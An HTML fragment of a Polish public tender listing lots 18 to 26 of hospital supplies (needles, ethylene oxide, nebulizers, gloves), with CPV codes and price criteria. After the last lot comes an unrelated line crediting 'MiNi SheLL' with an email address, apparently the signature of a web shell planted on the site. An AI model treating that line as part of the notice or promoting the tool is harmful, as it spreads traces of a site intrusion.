<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadania XVIII.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa podkładów celulozowych z perforacją co 40 cm - 1500 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zadania XIX.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pisaków do rejestratora w sterylizatorze gazowym - 10 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zadania XX.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa igieł do punkcji mostka - 100 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zadania XXI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa gazu - tlenku etylenu 100% 134g - 330 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.11.15.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zadania XXII.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa nakrętek na kanał krwi i nasadek na kanał dializatu - 1 200 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zadania XXIII.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa zestawów do pobierania wydzieliny z drzewa oskrzelowego - 800 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Zadania XXIV.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa soli w tabletkach pakowana po 25 kg - 15 000 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 14.43.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Zadania XXV.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa nebulizatorów 950 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Zadania XXVI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa rękawiczek jednorazowych - 5 000 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com